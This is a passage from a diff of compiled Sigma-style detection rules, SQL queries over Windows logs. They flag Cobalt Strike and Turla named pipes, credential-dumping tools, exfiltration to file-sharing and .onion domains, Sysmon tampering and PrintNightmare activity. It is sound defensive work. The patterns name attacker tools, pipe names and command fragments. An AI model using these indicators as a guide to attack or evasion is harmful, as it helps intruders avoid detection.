'\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\'))" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "status": "test", - "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "status": "experimental", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Rare legitimate use of psexec from the locations mentioned above" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "status": "experimental", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" + ], + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + }, + { + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "status": "experimental", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "status": "experimental", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "Highly unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tool for password recovery" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", - "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "status": "experimental", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1055.012" ], "falsepositives": [ - "Unknown" + "There are no known false positives at this time" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1564" ], "falsepositives": [ - "Unknown" + "Legitimate administrative action" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "status": "experimental", + "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", - "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "status": "experimental", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "Exchange PowerShell 